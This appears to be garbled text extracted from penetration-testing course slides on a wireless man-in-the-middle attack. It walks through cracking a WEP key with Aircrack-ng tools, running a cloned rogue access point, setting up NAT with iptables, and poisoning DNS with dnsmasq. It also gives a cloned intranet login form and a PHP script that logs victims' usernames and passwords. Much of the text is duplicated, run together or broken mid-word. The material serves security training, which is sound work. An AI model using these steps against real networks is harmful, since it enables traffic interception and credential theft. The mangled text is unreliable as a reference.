Hardware for the Attack:Antennas, Amps, and WiFi Cardste as, ps, a d W Ca ds



Laptop

A laptop computer with two PC card (PCMCIA) slots or one d l d l d f hPCMCIA card slot and one mini-PCI slot, is required for the

two wireless network cards.

The laptop serves as a clone of the target AP and provides connectivity back to the target wireless network.

The platform also runs a web server to host any spoofed websites discovered during an attack.

Therefore, the laptop should be well equipped to handle



memory-intensive tasks.

Wireless Network Cards

Two wireless network cards are required for an attack Two wireless network cards are required for an attack platform.

One wireless card provides access point functionality for wireless client(s) (victims), and must be able to go into Host AP mode (also known as master mode).

The second wireless card provides connectivity to the target AP and can be any 802 11 Border Gateway target AP, and can be any 802.11 Border Gateway (B/G) card supported by Linux.



Wireless Card Interfaces for the Attack PlatformAttack Platform



Choosing the Right Antenna

Wireless connectivity to the target AP and the wireless client(s) is essential in order for this attack to work.

You need to have a strong wireless signal broadcasting from the Host AP access point.

Therefore, choosing the right antenna is important.

There are two main types of antennas to consider for this attack: directional and omni-directional



this attack: directional and omni-directional antennas.

Amplifying the Wireless Signal

A 2.4 gigahertz (GHz) amplifier is designed to extend the range of a 2.4 GHz radio 4 g g ( ) p g g 4device or a AP.

The amplifier is used in conjunction with an antenna to boost the signal of your MITM access point.

The intent is for the wireless signal access point to be stronger than the wireless signal of the target access point.

A typical amplifier has two connectors; depending on the connector type, one connection is made to the SENAO wireless card using a Multimedia Communications Exchange (MMCX) to N-Male pigtail, and the other connects to



g ( ) p g ,the omni-directional antenna.

Signal Strength



Identify and Compromisethe Target Access Pointthe Target Access Point

Before you can mount the MITM attack, you need to identify and compromise the target AP.

To gather preliminary data on the target, you need to go back to WarDriving basics and gain as much information about the target as you can.

Example:

•VisitorLAN

Target network Service Set Identifier (SSID):

Target network Basic Service Set Identifier (BSSID):

•00:13:10:1E:65:42

Target network Basic Service Set Identifier (BSSID):

•00:02:2D:2D:82:36

Wireless client connected:

00:02:2D:2D:82:36

• WEP

The target network encryption:

Th t t t k IP



•192.168.1.0/24

The target network IP range:

Compromising the Target

Y h id tifi d t t i t h t f You have identified a target access point; however, to perform your MITM attack you need to connect to the access point, and to do this you need to compromise the WEP key.

To crack the WEP key, you need to know the BSSID of the access point and the Media Access Control (MAC) address of a wireless client already connected.y

Using the Aircrack-ng tools, you can begin the attack against the visiting LAN access pointvisiting LAN access point.



Crack the WEP key

i d h l i f d To start airodump-ng on the wlan0 interface and capture any IVs called visitorlan-01.cap to an output file, use the following command:

He..he..i got the key to

decrypt

• airodump-ng -w visitorlan -c 6 wlan0

Once airodump-ng is running, open a new terminal and t t i l ith th f ll i dstart aireplay-ng with the following command:

aireplay-ng --arpreplay -baireplay ng arpreplay b 00:13:10:1E:65:42 -m 68 -n 68 -dff:ff:ff:ff:ff:ff -h 00:02:2D:2D:82:36 wlan



Aircrack-ng Cracked the WEP KeyWEP Key

Now you have all of the information required to connect to the target access point and begin your MITM attackaccess point and begin your MITM attack.



The MITM Attack Laptop ConfigurationConfiguration

Connecting to the target network:

• The wireless interface wlan0 is the internal mini-PCI card, which provides the connection to the target wireless network.

Using a series of commands, you can set up the wireless connection to connect to the target access point:

ifconfig wlan0 down

iwconfig wlan0 mode Managed ap 00:13:10:1E:65:42

iwconfig wlan0 key 6D617474686577303232333036

ifconfig wlan0 up



dhcpcd wlan0

The MITM Attack Laptop Configuration (cont’d)Configuration (cont d)

wlan1 - Setting up the AP:

The second wireless card (i.e., wlan1) is the PCMCIA SENAO card, which acts as the Host AP access point. Configure the wlan1 interface to be an access point using the following commands:b p g g

ifconfig wlan1 downiwconfig wlan1 mode Master essid VisitorLANVisitorLANiwconfig wlan1 key 6D617474686577303232333036ifconfig wlan1 192.168.10.1 netmask 255.255.255.0ifconfig wlan1 up

At this point the MITM access point is configured on the wlan1



At this point, the MITM access point is configured on the wlan1 interface using the same settings as the target AP.

IP Forwarding and NAT using IPtablesusing IPtables

You will need to enable IP forwarding and NAT, ultimately creating a wireless You will need to enable IP forwarding and NAT, ultimately creating a wireless router/gateway.

IP forwarding provides the ability to have both wireless interfaces communicate and pass IP forwarding provides the ability to have both wireless interfaces communicate and pass traffic to each other.

NAT allows us to translate the IP addresses used on one network (wlan0-192.168.1.x) to an NAT allows us to translate the IP addresses used on one network (wlan0 192.168.1.x) to an IP address on another network (wlan1-192.168.10.x).

On the MITM attack laptop, the network associated to the wlan1 interface is the internal p p,network, and the network associated to the wlan0 interface is the outside network.

When a client from the internal network (wlan1) connects to an IP located in the outside network (wlan0) the destination addresses are updated as they pass through the attack



network (wlan0) the destination addresses are updated as they pass through the attack system.

Installing IPtables andIP ForwardingIP Forwarding

IPtables is the command line program used to configure the packet IPtables is the command-line program used to configure the packet filtering rule sets and NAT.

Start the IPtables service using the following command:

• /etc/init.d/iptables start/ / / p

Next, enable IP forwarding by editing the /etc/sysctl.conf file and changing the net.pv4.ip_forward variable from 0 to 1.g g p 4 p



/etc/sysctl.conf file



Establishing the NAT Rules

You know the IP address of the target access point is 192.168.1.0/24, and you established your IP address to be on the 192.168.10.0/24 network. The following

d d f lcommands define NAT rules:

Flush the current rules:

iptables -Fpiptables -t nat -F

Flush the current rules:

i t bl A FORWARD i l 0iptables -A FORWARD -i wlan0 -s 192.168.1.0/255.255.255.0 -j ACCEPT

iptables -A FORWARD -i wlan1 -s 192.168.10.0/255.255.255.0 -j ACCEPTi t bl t t A POSTROUTING l 0 jiptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE

After the rules have been defined, save with the following command:



/etc/init.d/iptables save

Establishing IPtable NAT Rules (cont’d)(cont d)



Dnsmasq

D i li ht i ht il fi d D i N S t Dnsmasq is a lightweight, easily configured Domain Name System (DNS) forwarder and Dynamic Host Configuration Protocol (DHCP) server.

It serves two important functions on your attack platform: provides IP addresses to the wireless clients connecting to your access point, and gives us the ability to monitor and poison DNS queries.g y p q

This tool is very useful when redirecting the DNS requests for web applications to your spoofed web serverapplications to your spoofed web server.



Configuring Dnsmasq

Configuring Dnsmasq is reasonably simple

The program has many options, but you only need to edit a few lines to get it up and running

Edit the Dnsmasq configuration file located at /etc/dnsmasq.conf:

After you configure Dnsmasq, start it with the following command:

•/etc/init.d/dnsmasq start

DHCP and DNS requests are logged in /var/log/messages

To monitor incoming DHCP requests, you can check the /var/log/messages file with the following command:



following command:

•grep dnsmasq /var/log/messages | grep –i dhcp

/etc/dnsmasq.conf



Viewing DHCP Requests from a Dnsmasq Log Filefrom a Dnsmasq Log File



Viewing DNS Queries from a Dnsmasq Log Filefrom a Dnsmasq Log File



Airpwn

Airpwn is a supporting tool for 802.11 (wireless) packet injection.

It spoofs 802.11 packets to verify whether the access point is valid or not.

You can send the data to the AP (access point) and also get the reply from the AP while using a traditional 802.11 network.

The client will take Airpwn's packet and remove the APs by controlling the server-side communication through Airpwn because it is almost



the server-side communication through Airpwn because it is almost guaranteed to provide the packet before the AP.

Configuration Files

Airpwn configuration files are simple text files with one or more request/response blocks.

Request/response blocks start with the begin command followed by:Request/response blocks start with the begin command followed by:

• A match expression.• An optional ignore expression.• A response filename.

A single configuration file is transmitted to Airpwn and also to command line parameters while processing.p p g

Configuration includes one or more files and each file contains some standards.



Using Airpwn on WEP-Encrypted NetworksEncrypted Networks

Airpwn can decode WEP traffic and send a WEP-encrypted response.

Use Airpwn with a WEP-protected network by including the network’s key to the Airpwn command line through –k keystring option.

Include multiple keys to the Airpwn command by using the -k option number of times, as Airpwn works at the same time on multiple networks.

keystring frames the WEP key.



Airpwn: Scripting

Airpwn should be configured to return the dynamic response data from Airpwn should be configured to return the dynamic response data from Python script in place of static response files.

I i ’ h i ( i It can use script’s output as the request expression (pyscript pythonmodule)is appropriate in place of response.

It supports the airpwn_response function of your module containing an argument.

The airpwn_response function should retrieve with response data or else send “None”, if there is no response to send.



Apache Hypertext Preprocessor and Virtual Web Serversand Virtual Web Servers

Apache is a versatile and configurable web server that provides the ability Apache is a versatile and configurable web server that provides the ability to host spoofed web applications on the MITM attack laptop.

During the MITM attack, you will need to create a spoofed login page using Apache and PHP to capture user credentials.

Command to Apache:p

•/etc/init.d/apache2 start

During the MITM attack, spoof a web page and host it on your attack During the MITM attack, spoof a web page and host it on your attack platform.

In a real scenario, you might want to set up multiple websites to increase



the chance of capturing user credentials.

Virtual Directories

To host multiple instances or websites on your web server, you can create virtual web directories in the virtual web directories in the /etc/apache2/vhosts.d/00_default_vhost.conf file.

You can define multiple virtual directories in the You can define multiple virtual directories in the 00_default_vhost.conf file using the following command:

<VirtualHost 192.168.10.2:80>DocumentRoot "/var/www/localhost/htdocs/site1/"</VirtualHost><VirtualHost 192.168.10.3:80>D tR t "/ / /l lh t/htd / it 2/"DocumentRoot "/var/www/localhost/htdocs/site2/"</VirtualHost><VirtualHost 192.168.10.4:80>DocumentRoot "/var/www/localhost/htdocs/site3/"



</VirtualHost>

Virtual Directories (cont’d)

In the previous slide, each virtual host has a separate IP address defined for each site.

In order for this to work properly, you need to define virtual interfaces for each IP address using the following commands:g g

ifconfig wlan1:0 192.168.10.2 netmask 255.255.255.0ifconfig wlan1:1 192.168.10.3 netmask 255.255.255.0gifconfig wlan1:2 192.168.10.4 netmask 255.255.255.0



Clone the Target Access Point and Begin the AttackPoint and Begin the Attack

O fi i h d ith th fi ti f MITM Once you are finished with the configuration of your MITM attack laptop, you can establish your wireless connections and begin the attack.



Start the Wireless Interface

After you are done configuring the wireless file you can start the wireless After you are done configuring the wireless file, you can start the wireless interfaces and establish your wireless network connections.

Establish the connection to your target wireless

•/etc/init.d/net.wlan0 start

Establish the connection to your target wireless network using the command:

/etc/init.d/net.wlan0 start

Next, start your other wireless interface (wan1) using the command:

•/etc/init.d/net.wlan1 start

using the command:



Start the Wireless Interfaces (cont’d)(cont d)



Deauthenticate ClientsConnected to the Target Access PointConnected to the Target Access Point

To get the victim wireless clients to connect to your access point, you can wait il h di d f h until they disconnect and reconnect, or you can force them to reconnect.

To force the clients off the target wireless network, you can de-authenticate them from the target access point using another computer.



Wait for the Client toAssociate to Your Access PointAssociate to Your Access Point

If all goes well and the signal strength of your access point is stronger than the target k i h ld h i l li i networks access point, you should see the wireless client connect to your access point.

When a wireless client associates to your access point, you need to assign it an IP address.

Dnsmasq will provide an IP address to the client using the DHCP allocations defined in the /etc/dnsmasq.conf file.

The client will use the IP address of your access point as the gateway and primary DNS



y p g y p yserver.

Spoof the Application

The goal of the spoofed application is to have the user log in to your web page instead of the real (authorized) one

This won’t be difficult, if the site is not using SSL and is using a form-based authentication

real (authorized) one.

A quick and easy way to spoof the site is to download the target web page using wget and

page.

A quick and easy way to spoof the site is to download the target web page using wget and modify the source.

wget -r http://192.168.1.30



Once you have all the files associated with the web page, you need to modify the source HTML and add some extra code to capture the username and password form variables.

Modify the Page

When you edit the index.html file using our favorite text y geditor, you should change the content of the page so that it looks the same to the user.



Example Page

<h1>Intranet Login</h1><form action='login php' method="post"><form action= login.php method= post ><table border=0><tr><td>Username:</td><td><input type=text name="username" size=30></td></tr><tr><td>

dPassword:</td><td><input type="password" name="password" size=30></td></tr></td></tr></table><input type="submit" value="Submit"></form>



</body></html>

Example Page (cont’d)

Now that you know the names of the form variables the method and the Now that you know the names of the form variables, the method, and the action, you can create your own backend login.php page.

Using a simple PHP page, capture the user credentials and redirect the client back to the original source of the web page.



Login/php page

<?php$username = $ POST['username'];$username $_POST[ username ];$password = $_POST['password'];$log='/var/log/apache2/captured.txt';$ $ $$user_info=("Username:$username Password:$password" .

"\n");{$fp=fopen($log,"a");fwrite($fp, $user_info);fclose($fp);($ p);}$URL=("http://192.168.1.30");header ("Location: $URL");



header ("Location: $URL");?>

Redirect Web Traffic Using DnsmasqDnsmasq

Once your fake login page is functional, you can poison the client’s DNS traffic to y g p g , y predirect any queries to your malicious login page.

To do this, you can modify the address variable of your Dnsmasq configuration file To do this, you can modify the address variable of your Dnsmasq configuration file to add the DNS name of your target and the IP address of your web server.

• address=/login.intranet/192.168.10.1

Once you update the address variable, you have to restart the Dnsmasq service to enable the changes:

• /etc/init d/dnsmasq restart• /etc/init.d/dnsmasq restart

At this point, if a client connected to your access point makes a request for the login.intranet web page, the IP address will resolve to your web server, which is hosting the spoofed login page.



g p g p g

Summary

In this module we reviewed advanced techniques for wireless penetration In this module, we reviewed advanced techniques for wireless penetration testing.

We have discussed various wireless concepts such as its components and standards.

We have reviewed Wired Equivalent Privacy (WEP), its issues, flaws, and securitysecurity.

We have discussed various wireless security technologies such as WPA, EAP, and TKIP.

We have discussed different attacks and tools such as War Driving, Netstumbler, and MITM attacks.



ecsav4 module 06 advanced wireless testing_norestriction

Documents

extensible authentication protocol

wired equivalent privacy

wired equivalent policy

wireless penetration testing

dnsmasq log file

enable ip forwarding

mitm access point

target access point